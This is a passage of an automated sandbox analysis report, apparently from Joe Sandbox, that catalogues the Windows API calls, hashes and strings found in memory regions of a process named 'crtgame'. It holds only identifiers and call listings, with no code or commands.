                                                                              • Opcode Fuzzy Hash: 01b1e1a49803d93dc878cd084e92a14ab5f9b5764c2cf69b609b64a2d6d24cc8
                                                                              • Instruction Fuzzy Hash: 103139B19053149FCB10DF69C444AAABBF8BF58310F14455AE849D7641EB74A608CFA0
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,00000006,?,?), ref: 02C22A3B
                                                                              • closesocket.WS2_32(?), ref: 02C22A42
                                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02C22A89
                                                                              • WSASetLastError.WS2_32(00000000), ref: 02C22A97
                                                                              • closesocket.WS2_32(?), ref: 02C22A9E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                                              • String ID:
                                                                              • API String ID: 1561005644-0
                                                                              • Opcode ID: a80aac80367733a8bbb4779d0c0e4b2b284604e2feb373b10b6d44db2eedd625
                                                                              • Instruction ID: 14b6d9f3b7f04ad5e9ca784260e950ebd43d7ea295697b523b6fdbceffad09d7
                                                                              • Opcode Fuzzy Hash: a80aac80367733a8bbb4779d0c0e4b2b284604e2feb373b10b6d44db2eedd625
                                                                              • Instruction Fuzzy Hash: D421FB77940215EBEB34ABB8884476AB7E9EF84315F104969EC45C3641FF708A48C7A1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C221DA
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C221ED
                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C22224
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C22237
                                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C22261
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1856819132-0
                                                                              • Opcode ID: ac539ff56b2426fa02cc5684ac28d57e6e6bc34b309b44cdc764d49d28de821f
                                                                              • Instruction ID: 6e04eb053808103aea37fa3b65388761af8e40569ec2c0341a0ca760b63edfa8
                                                                              • Opcode Fuzzy Hash: ac539ff56b2426fa02cc5684ac28d57e6e6bc34b309b44cdc764d49d28de821f
                                                                              • Instruction Fuzzy Hash: A0117F72D41228DBCF15DFA5E8046AEFFBAFF44320F004A1AE815E2260DB718658DBC1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C2229D
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C222B0
                                                                              • TlsGetValue.KERNEL32 ref: 02C222E7
                                                                              • TlsSetValue.KERNEL32(?), ref: 02C22300
                                                                              • TlsSetValue.KERNEL32(?,?,?), ref: 02C2231C
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22350
                                                                                • Part of subcall function 02C22341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C22360
                                                                                • Part of subcall function 02C22341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C22370
                                                                                • Part of subcall function 02C22341: GetLastError.KERNEL32 ref: 02C2237A
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 1856819132-0
                                                                              • Opcode ID: bcc6751ca129b484f443ec6ed710f6b996e0bfde4d40860e6a7acaa1e80c5f14
                                                                              • Instruction ID: 77837fcc6ddaea1ac9ad8801fdc30cf10be6d0ac92b4944fc87102e99b8bf963
                                                                              • Opcode Fuzzy Hash: bcc6751ca129b484f443ec6ed710f6b996e0bfde4d40860e6a7acaa1e80c5f14
                                                                              • Instruction Fuzzy Hash: A9115E76D102289BCF15DFA5D8046AEFFBAFF44310F00452AE804A3220DB719A54DFD1
                                                                              APIs
                                                                                • Part of subcall function 02C2AAEE: __EH_prolog.LIBCMT ref: 02C2AAF3
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C2B6B8
                                                                                • Part of subcall function 02C33F5A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C3359C,?,02C50F6C,00000000,00000001), ref: 02C33FAF
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B6CE
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C2B6E1
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,Function_00030DA4,?,00000001), ref: 02C2B6F1
                                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C2B6FF
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                              • String ID:
                                                                              • API String ID: 2725315915-0
                                                                              • Opcode ID: 2e2e770dbae0014c1503229b6bef33db700039e0bb7ecb5266fbe9be2d5b7cff
                                                                              • Instruction ID: aff4b6186e903ee36e5034c1e6645441faf4be9161b05428d4656e22ad4fb66e
                                                                              • Opcode Fuzzy Hash: 2e2e770dbae0014c1503229b6bef33db700039e0bb7ecb5266fbe9be2d5b7cff
                                                                              • Instruction Fuzzy Hash: B10181B6A40214AFDB10DBA4DD89F97B7EDEF04319F004A64F616D7290DB61E8188BA0
                                                                              APIs
                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C22432
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C22445
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C22454
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C22469
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22470
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 747265849-0
                                                                              • Opcode ID: cd822799d565ecd7e4463680e5d1f489fc921153c2b5b5bf80e10e832ec77ff1
                                                                              • Instruction ID: 5f644e9b69fda2a4d2ebf2b985af781e4d76763fcfa2d971afc10656c41bdeaf
                                                                              • Opcode Fuzzy Hash: cd822799d565ecd7e4463680e5d1f489fc921153c2b5b5bf80e10e832ec77ff1
                                                                              • Instruction Fuzzy Hash: 36F03076641214BFD710ABA0ED89FD7B76CFB44711F800911F701D6481DB61B628CBE1
                                                                              APIs
                                                                              • InterlockedIncrement.KERNEL32(?), ref: 02C21ED2
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C21EEA
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C21EF9
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C21F0E
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C21F15
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 830998967-0
                                                                              • Opcode ID: 3f0b02856b9c37a8304a60430c210a316ef8de9022404cc700c50693d76ba7ab
                                                                              • Instruction ID: d1f6380d7f974b8b60df3843feb9d8966a42ac7ef32752858f391ccbfc5dd4c8
                                                                              • Opcode Fuzzy Hash: 3f0b02856b9c37a8304a60430c210a316ef8de9022404cc700c50693d76ba7ab
                                                                              • Instruction Fuzzy Hash: 87F01776642614BFDB01AFA1ED88FC7BBACFB54751F000512F60182841DB61B6698BE0
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?), ref: 02C230C3
                                                                              • WSAStringToAddressA.WS2_32(?,00000017,00000000,?,?), ref: 02C23102
                                                                              • _memcmp.LIBCMT ref: 02C23141
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastString_memcmp
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 1618111833-2422070025
                                                                              • Opcode ID: 4f8450d488eabe948eeca4853730f28cf6bcf1ce7ff834a610591d5febe603f2
                                                                              • Instruction ID: fb8fc46f8c842d9d171e09f85e340519fd704fa2305399cead47da10266c6fb6
                                                                              • Opcode Fuzzy Hash: 4f8450d488eabe948eeca4853730f28cf6bcf1ce7ff834a610591d5febe603f2
                                                                              • Instruction Fuzzy Hash: 4731D572A003689FDB219F64CC8076EB7B6AF85314F1049A9EC5557280EB759A49CB90
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C21F5B
                                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02C21FC5
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 02C21FD2
                                                                                • Part of subcall function 02C21712: __EH_prolog.LIBCMT ref: 02C21717
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                              • String ID: iocp
                                                                              • API String ID: 998023749-976528080
                                                                              • Opcode ID: 867376d8fbaa75864530ba8ca54bf5bd0a2fad9ac3e569f1fe1ae8c07572bc77
                                                                              • Instruction ID: 7307d453656931eb3dc2e09aa93172e14de2fe272edde8081cb0244da39fbfe8
                                                                              • Opcode Fuzzy Hash: 867376d8fbaa75864530ba8ca54bf5bd0a2fad9ac3e569f1fe1ae8c07572bc77
                                                                              • Instruction Fuzzy Hash: 3521E4B1901B449FC720DF6AC50055BFBF8FFA4720B108A1FD8A693AA0D7B0A604CF91
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 02C33564
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              • std::exception::exception.LIBCMT ref: 02C33582
                                                                              • __CxxThrowException@8.LIBCMT ref: 02C33597
                                                                                • Part of subcall function 02C33F5A: RaiseException.KERNEL32(?,?,?,02C50F6C,?,00000400,?,?,?,02C3359C,?,02C50F6C,00000000,00000001), ref: 02C33FAF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                              • String ID: bad allocation
                                                                              • API String ID: 3074076210-2104205924
                                                                              • Opcode ID: dedf32ac8b9b8e5067d7d536343d590434f9fcc9783b1e0289d1c2158f13ec13
                                                                              • Instruction ID: 92b6ef3ba25dae8d475605f8c12f05da7519f972401c3070020d3afa1c96cde8
                                                                              • Opcode Fuzzy Hash: dedf32ac8b9b8e5067d7d536343d590434f9fcc9783b1e0289d1c2158f13ec13
                                                                              • Instruction Fuzzy Hash: F0E0657150024EAAEF02FEA4DD049EFB77DAB00304F4049D5EC15A6590DF72DB54D9E1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C237B6
                                                                              • __localtime64.LIBCMT ref: 02C237C1
                                                                                • Part of subcall function 02C32000: __gmtime64_s.LIBCMT ref: 02C32013
                                                                              • std::exception::exception.LIBCMT ref: 02C237D9
                                                                                • Part of subcall function 02C31ED3: std::exception::_Copy_str.LIBCMT ref: 02C31EEC
                                                                                • Part of subcall function 02C29EB1: __EH_prolog.LIBCMT ref: 02C29EB6
                                                                                • Part of subcall function 02C29EB1: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C29EC5
                                                                                • Part of subcall function 02C29EB1: __CxxThrowException@8.LIBCMT ref: 02C29EE4
                                                                              Strings
                                                                              • could not convert calendar time to UTC time, xrefs: 02C237CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                              • String ID: could not convert calendar time to UTC time
                                                                              • API String ID: 1963798777-2088861013
                                                                              • Opcode ID: 06a5ec514f1bcc9ded4eb2ec0a81199ccb65ae13d2d3543f85a4013f64d3c511
                                                                              • Instruction ID: 9d2c2f51a928a3d28a3f8a5fe00e1a08485d6b1e09aaf4a8c6026fd030e74b7b
                                                                              • Opcode Fuzzy Hash: 06a5ec514f1bcc9ded4eb2ec0a81199ccb65ae13d2d3543f85a4013f64d3c511
                                                                              • Instruction Fuzzy Hash: 7EE032B1E1025A9BCB15EFA0DA047AFB7BAEB14300F10899AD815A2240DF3856099E80
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30DBF
                                                                                • Part of subcall function 02C23FDC: __EH_prolog.LIBCMT ref: 02C23FE1
                                                                                • Part of subcall function 02C23FDC: CreateEventA.KERNEL32(00000000,02C2A5C3,?,00000000), ref: 02C23FF3
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C30DB4
                                                                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30E00
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02C24149), ref: 02C30ED1
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$Event$CreateH_prolog
                                                                              • String ID:
                                                                              • API String ID: 2825413587-0
                                                                              • Opcode ID: 2bf659bf0c1289a96bb10a25edb773826fb19db1b4789719c1cccab2de9a2e91
                                                                              • Instruction ID: fca265af91c98ea324181ae50aafea850724a09908f3cec80bedab0d36b594a7
                                                                              • Opcode Fuzzy Hash: 2bf659bf0c1289a96bb10a25edb773826fb19db1b4789719c1cccab2de9a2e91
                                                                              • Instruction Fuzzy Hash: 7D5195766007458FDB22DF28C88479B77E5EF88328F190A18E8A997390D735E945CF91
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3F94B
                                                                              • __isleadbyte_l.LIBCMT ref: 02C3F979
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9A7
                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,00000000,00000000,?), ref: 02C3F9DD
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                              • String ID:
                                                                              • API String ID: 3058430110-0
                                                                              • Opcode ID: 845ca56c7634df09db491187908fa41122c079f0c66c349bc9cdf49642cdde57
                                                                              • Instruction ID: 484cdf58ceb0b2bf1f3957cc6603a92bc1f933e01812611b036aa5e3ba89a917
                                                                              • Opcode Fuzzy Hash: 845ca56c7634df09db491187908fa41122c079f0c66c349bc9cdf49642cdde57
                                                                              • Instruction Fuzzy Hash: BD31AD31A00346BFEF228E79CC44BBA7BA5BF81314F154D2DE865875A0E730D951DB90
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 02C3FDB0
                                                                                • Part of subcall function 02C329AC: __FF_MSGBANNER.LIBCMT ref: 02C329C3
                                                                                • Part of subcall function 02C329AC: __NMSG_WRITE.LIBCMT ref: 02C329CA
                                                                                • Part of subcall function 02C329AC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02C329EF
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap_malloc
                                                                              • String ID:
                                                                              • API String ID: 501242067-0
                                                                              • Opcode ID: 1746118f866ab01f844c0bbb4fbcef22b29b66a770bd57e215f4007d9d42c812
                                                                              • Instruction ID: d7540c4b716caf35e69a5309130906bae0bccb85218ef507c347cfa811ef3699
                                                                              • Opcode Fuzzy Hash: 1746118f866ab01f844c0bbb4fbcef22b29b66a770bd57e215f4007d9d42c812
                                                                              • Instruction Fuzzy Hash: 0D11C632C40612ABCF232F75B80879E77DAAF483A5B104D2DE95E9A690DB30C950DAD5
                                                                              APIs
                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C31D92
                                                                              • ___ascii_stricmp.LIBCMT ref: 02C31DCA
                                                                              • __tolower_l.LIBCMT ref: 02C31DE0
                                                                                • Part of subcall function 02C3537A: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C35388
                                                                                • Part of subcall function 02C3537A: __isctype_l.LIBCMT ref: 02C353A9
                                                                              • __tolower_l.LIBCMT ref: 02C31DEF
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Locale$UpdateUpdate::___tolower_l$___ascii_stricmp__isctype_l
                                                                              • String ID:
                                                                              • API String ID: 2995433114-0
                                                                              • Opcode ID: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                              • Instruction ID: 3db4057288c0635597967b62e80cc4a067b8d072770fcdeae6cc265ce6907cbb
                                                                              • Opcode Fuzzy Hash: 45227b07271bb04968117c74aa6c8210f72f7e50330ca9abdaf3e931e9293719
                                                                              • Instruction Fuzzy Hash: 6A113A32900255AFC713AA69C884BBA77B9AF46265F0C0A58E82957180DBB15E00D690
                                                                              APIs
                                                                              • htons.WS2_32(?), ref: 02C23DA2
                                                                                • Part of subcall function 02C23BD3: __EH_prolog.LIBCMT ref: 02C23BD8
                                                                                • Part of subcall function 02C23BD3: std::bad_exception::bad_exception.LIBCMT ref: 02C23BED
                                                                              • htonl.WS2_32(00000000), ref: 02C23DB9
                                                                              • htonl.WS2_32(00000000), ref: 02C23DC0
                                                                              • htons.WS2_32(?), ref: 02C23DD4
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 3882411702-0
                                                                              • Opcode ID: fe6904b5f68d4df33819c9232d56288bac1181f65cee1f5632822fbb3fc47cb2
                                                                              • Instruction ID: 93cef359744148741e6c31dc23e0e63c102628f62cb8d5be539c041f174caad6
                                                                              • Opcode Fuzzy Hash: fe6904b5f68d4df33819c9232d56288bac1181f65cee1f5632822fbb3fc47cb2
                                                                              • Instruction Fuzzy Hash: 6111E139A00248EFCF019F64D885A5AB7B9FF08310F008896FC08DF201DB71DA18CBA1
                                                                              APIs
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000001,?,?,00000001,?,?,02C2335F,?,?,?,?,?), ref: 02C223D0
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C223DE
                                                                              • InterlockedExchange.KERNEL32(00000030,00000001), ref: 02C22401
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C22408
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: 8601cc689df246f4b74737414e5179bb8195f42b66cb5e4558aee5da3e5c5cf4
                                                                              • Instruction ID: a2714e1faf1a610f7b98d2971c5c395885ca45efbdb0d4db599a1260de20dc31
                                                                              • Opcode Fuzzy Hash: 8601cc689df246f4b74737414e5179bb8195f42b66cb5e4558aee5da3e5c5cf4
                                                                              • Instruction Fuzzy Hash: 9511AC71601204ABDB209F60CA84B67BBA8FB40704F1004A9FA019A140DBB1FA49CBA1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction ID: 54ec7086da6387219a4560d84d64f3f2fdb26b041bf217c1ee0b2cd60009280b
                                                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                              • Instruction Fuzzy Hash: 7A01483604014ABBCF136ED4CC418EE3F62BB59754B498816FE28A9031D737CAB1AB81
                                                                              APIs
                                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C224A9
                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02C224B8
                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02C224CD
                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02C224D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                              • String ID:
                                                                              • API String ID: 4018804020-0
                                                                              • Opcode ID: 6bfba2d9a72ba1a675494804b5a7e22132e1645977a83d0452afd86160416763
                                                                              • Instruction ID: 2c712061f75e2d56f0dd99a6e7a1347c46fa17e2d0b7f228860a23b1bb6ca748
                                                                              • Opcode Fuzzy Hash: 6bfba2d9a72ba1a675494804b5a7e22132e1645977a83d0452afd86160416763
                                                                              • Instruction Fuzzy Hash: 63F03C76641204AFDB00AFA5EC84B9BBBACFF44710F004515FA04C6141D771E6688FE1
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 02C22009
                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 02C22028
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C22037
                                                                              • CloseHandle.KERNEL32(00000000), ref: 02C2204E
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                              • String ID:
                                                                              • API String ID: 2456309408-0
                                                                              • Opcode ID: 9bcba0b7647c9a63e0b5b82cae636bb43d55d8937e0c2599fd6729d8678bed68
                                                                              • Instruction ID: 04ef1908c5a5e8d0521d73af8344c0e8db74d08274941afe2c4b7c3c0ad40fff
                                                                              • Opcode Fuzzy Hash: 9bcba0b7647c9a63e0b5b82cae636bb43d55d8937e0c2599fd6729d8678bed68
                                                                              • Instruction Fuzzy Hash: AE01DC714406249BC739AF54E808B9BFBF4EF04709F004A1DE84692990CF74A64CCF91
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$H_prologSleep
                                                                              • String ID:
                                                                              • API String ID: 1765829285-0
                                                                              • Opcode ID: 71cf3abfb4180e76550b005450bc0952b7e7347d43cc1e9625048a577f8655df
                                                                              • Instruction ID: 9d223dc0874c33b33f6796a276d7938748e36e729afc4edd8c179e5a92c70e25
                                                                              • Opcode Fuzzy Hash: 71cf3abfb4180e76550b005450bc0952b7e7347d43cc1e9625048a577f8655df
                                                                              • Instruction Fuzzy Hash: 47F05435A41110EFCB109F94D8C8B8DBBA4FF0D311F1082A9F619DB290CB359854CB91
                                                                              APIs
                                                                              • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02C27D5C,?,?,00000000), ref: 02C29059
                                                                              • getsockname.WS2_32(?,?,?), ref: 02C2906F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.2939863204.0000000002C21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_2c21000_crtgame.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLastgetsockname
                                                                              • String ID: &'
                                                                              • API String ID: 566540725-655172784
                                                                              • Opcode ID: de4acd66ebda279131894242fc7f6397a790257c466de96afc6a817cf972c0b2
                                                                              • Instruction ID: e4cc6e97e0d165e3b39c3ef1155f11a3fb78213b4fe09c111ff851a7fe76659a
                                                                              • Opcode Fuzzy Hash: de4acd66ebda279131894242fc7f6397a790257c466de96afc6a817cf972c0b2
                                                                              • Instruction Fuzzy Hash: 55219276A00218DFDB10DF68D844ACEB7F5FF4C310F20856AE918EB281EB30E9458B94
